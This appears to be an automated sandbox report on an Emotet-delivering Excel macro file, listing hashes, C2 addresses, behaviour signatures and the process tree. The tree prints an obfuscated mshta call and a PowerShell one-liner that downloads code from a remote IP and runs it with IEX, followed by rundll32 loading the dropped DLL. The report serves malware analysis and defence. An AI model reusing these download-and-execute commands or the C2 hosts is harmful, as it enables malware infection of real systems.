Analysis

  • max time kernel
    150s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    20-01-2022 07:03

General

  • Target

    bf154edb1260fa98f30bb6201ed8abd72a55e51938f300f504e164aea6a40603.xlsm

  • Size

    115KB

  • MD5

    cb5ae08f0635dff32c684570750108b5

  • SHA1

    33c65f18d7f753d82cb4ac73540d5e53acb61d5f

  • SHA256

    bf154edb1260fa98f30bb6201ed8abd72a55e51938f300f504e164aea6a40603

  • SHA512

    4728bc8629c0584e23d02d4705ce607c6dd76740f4b64b089c8df5dc30f3fd3bec6d6dd4e39ab0bddb4da4fad6bc184496f580232555f74148db38455084f564

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0x5cff39c3/sec/se1.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://92.255.57.195/sec/se1.png

Extracted

Family

emotet

Botnet

Epoch5

C2

45.138.98.34:80

69.16.218.101:8080

51.210.242.234:8080

185.148.168.220:8080

142.4.219.173:8080

54.38.242.185:443

191.252.103.16:80

104.131.62.48:8080

62.171.178.147:8080

217.182.143.207:443

168.197.250.14:80

37.44.244.177:8080

66.42.57.149:443

210.57.209.142:8080

159.69.237.188:443

116.124.128.206:8080

128.199.192.135:8080

195.154.146.35:443

185.148.168.15:8080

195.77.239.39:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 7 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\bf154edb1260fa98f30bb6201ed8abd72a55e51938f300f504e164aea6a40603.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:748
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:536
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1112
        • C:\Windows\SysWOW64\mshta.exe
          mshta http://0x5cff39c3/sec/se1.html
          3⤵
          • Blocklisted process makes network request
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1472
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se1.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1688
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1452
              • C:\Windows\SysWow64\rundll32.exe
                C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
                6⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1804
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                  7⤵
                  • Loads dropped DLL
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:1564
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lwjvcodcfnuqe\hqtaaelfjqnnism.agg",LqMad
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1852
                    • C:\Windows\SysWOW64\rundll32.exe
                      C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lwjvcodcfnuqe\hqtaaelfjqnnism.agg",DllRegisterServer
                      9⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1536

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    System Information Discovery

    2
    T1082

    Query Registry

    1
    T1012

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\Documents\ssd.dll
      MD5

      32acc61226f47023b7e70deca529216a

      SHA1

      5bfe17b62987edcd8cc6e76448f9cbd8fef9d13f

      SHA256

      5472d14831a29dd4c1584c085266a9bf829ff6d21cb944ee1c719edb8646dec1

      SHA512

      dbde93cf65bba84cda4c15c976015d27ea09cb9915c1f59dfeb7f87013679bad46f74082a6ad16a8aa04e3f306fd97e7767c8e4ac62b3686697268480698da21

    • \Users\Public\Documents\ssd.dll
      MD5

      32acc61226f47023b7e70deca529216a

      SHA1

      5bfe17b62987edcd8cc6e76448f9cbd8fef9d13f

      SHA256

      5472d14831a29dd4c1584c085266a9bf829ff6d21cb944ee1c719edb8646dec1

      SHA512

      dbde93cf65bba84cda4c15c976015d27ea09cb9915c1f59dfeb7f87013679bad46f74082a6ad16a8aa04e3f306fd97e7767c8e4ac62b3686697268480698da21

    • \Users\Public\Documents\ssd.dll
      MD5

      32acc61226f47023b7e70deca529216a

      SHA1

      5bfe17b62987edcd8cc6e76448f9cbd8fef9d13f

      SHA256

      5472d14831a29dd4c1584c085266a9bf829ff6d21cb944ee1c719edb8646dec1

      SHA512

      dbde93cf65bba84cda4c15c976015d27ea09cb9915c1f59dfeb7f87013679bad46f74082a6ad16a8aa04e3f306fd97e7767c8e4ac62b3686697268480698da21

    • \Users\Public\Documents\ssd.dll
      MD5

      32acc61226f47023b7e70deca529216a

      SHA1

      5bfe17b62987edcd8cc6e76448f9cbd8fef9d13f

      SHA256

      5472d14831a29dd4c1584c085266a9bf829ff6d21cb944ee1c719edb8646dec1

      SHA512

      dbde93cf65bba84cda4c15c976015d27ea09cb9915c1f59dfeb7f87013679bad46f74082a6ad16a8aa04e3f306fd97e7767c8e4ac62b3686697268480698da21

    • \Users\Public\Documents\ssd.dll
      MD5

      32acc61226f47023b7e70deca529216a

      SHA1

      5bfe17b62987edcd8cc6e76448f9cbd8fef9d13f

      SHA256

      5472d14831a29dd4c1584c085266a9bf829ff6d21cb944ee1c719edb8646dec1

      SHA512

      dbde93cf65bba84cda4c15c976015d27ea09cb9915c1f59dfeb7f87013679bad46f74082a6ad16a8aa04e3f306fd97e7767c8e4ac62b3686697268480698da21

    • \Users\Public\Documents\ssd.dll
      MD5

      32acc61226f47023b7e70deca529216a

      SHA1

      5bfe17b62987edcd8cc6e76448f9cbd8fef9d13f

      SHA256

      5472d14831a29dd4c1584c085266a9bf829ff6d21cb944ee1c719edb8646dec1

      SHA512

      dbde93cf65bba84cda4c15c976015d27ea09cb9915c1f59dfeb7f87013679bad46f74082a6ad16a8aa04e3f306fd97e7767c8e4ac62b3686697268480698da21

    • \Users\Public\Documents\ssd.dll
      MD5

      32acc61226f47023b7e70deca529216a

      SHA1

      5bfe17b62987edcd8cc6e76448f9cbd8fef9d13f

      SHA256

      5472d14831a29dd4c1584c085266a9bf829ff6d21cb944ee1c719edb8646dec1

      SHA512

      dbde93cf65bba84cda4c15c976015d27ea09cb9915c1f59dfeb7f87013679bad46f74082a6ad16a8aa04e3f306fd97e7767c8e4ac62b3686697268480698da21

    • \Users\Public\Documents\ssd.dll
      MD5

      32acc61226f47023b7e70deca529216a

      SHA1

      5bfe17b62987edcd8cc6e76448f9cbd8fef9d13f

      SHA256

      5472d14831a29dd4c1584c085266a9bf829ff6d21cb944ee1c719edb8646dec1

      SHA512

      dbde93cf65bba84cda4c15c976015d27ea09cb9915c1f59dfeb7f87013679bad46f74082a6ad16a8aa04e3f306fd97e7767c8e4ac62b3686697268480698da21

    • \Users\Public\Documents\ssd.dll
      MD5

      32acc61226f47023b7e70deca529216a

      SHA1

      5bfe17b62987edcd8cc6e76448f9cbd8fef9d13f

      SHA256

      5472d14831a29dd4c1584c085266a9bf829ff6d21cb944ee1c719edb8646dec1

      SHA512

      dbde93cf65bba84cda4c15c976015d27ea09cb9915c1f59dfeb7f87013679bad46f74082a6ad16a8aa04e3f306fd97e7767c8e4ac62b3686697268480698da21

    • memory/536-58-0x000007FEFB7E1000-0x000007FEFB7E3000-memory.dmp
      Filesize

      8KB

    • memory/748-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/748-54-0x000000002FFA1000-0x000000002FFA4000-memory.dmp
      Filesize

      12KB

    • memory/748-57-0x0000000074F01000-0x0000000074F03000-memory.dmp
      Filesize

      8KB

    • memory/748-55-0x0000000070FD1000-0x0000000070FD3000-memory.dmp
      Filesize

      8KB

    • memory/1536-96-0x00000000001E0000-0x0000000000208000-memory.dmp
      Filesize

      160KB

    • memory/1536-100-0x00000000004A0000-0x00000000004C8000-memory.dmp
      Filesize

      160KB

    • memory/1536-116-0x0000000002B71000-0x0000000002B95000-memory.dmp
      Filesize

      144KB

    • memory/1536-114-0x0000000002B10000-0x0000000002B38000-memory.dmp
      Filesize

      160KB

    • memory/1536-112-0x0000000002910000-0x0000000002938000-memory.dmp
      Filesize

      160KB

    • memory/1536-110-0x0000000002750000-0x0000000002778000-memory.dmp
      Filesize

      160KB

    • memory/1536-108-0x00000000026F0000-0x0000000002718000-memory.dmp
      Filesize

      160KB

    • memory/1536-106-0x0000000002590000-0x00000000025B8000-memory.dmp
      Filesize

      160KB

    • memory/1536-104-0x0000000002480000-0x00000000024A8000-memory.dmp
      Filesize

      160KB

    • memory/1564-82-0x0000000000670000-0x0000000000698000-memory.dmp
      Filesize

      160KB

    • memory/1564-91-0x0000000002880000-0x00000000028A8000-memory.dmp
      Filesize

      160KB

    • memory/1564-88-0x0000000002820000-0x0000000002848000-memory.dmp
      Filesize

      160KB

    • memory/1564-86-0x0000000002550000-0x0000000002578000-memory.dmp
      Filesize

      160KB

    • memory/1564-84-0x0000000002460000-0x0000000002488000-memory.dmp
      Filesize

      160KB

    • memory/1564-80-0x00000000003B0000-0x00000000003D8000-memory.dmp
      Filesize

      160KB

    • memory/1564-78-0x00000000001F0000-0x0000000000218000-memory.dmp
      Filesize

      160KB

    • memory/1688-64-0x0000000001F02000-0x0000000001F04000-memory.dmp
      Filesize

      8KB

    • memory/1688-62-0x0000000001F00000-0x0000000001F01000-memory.dmp
      Filesize

      4KB

    • memory/1688-63-0x0000000001F01000-0x0000000001F02000-memory.dmp
      Filesize

      4KB

    • memory/1804-71-0x00000000002B0000-0x00000000002D8000-memory.dmp
      Filesize

      160KB

    • memory/1852-93-0x0000000000300000-0x0000000000328000-memory.dmp
      Filesize

      160KB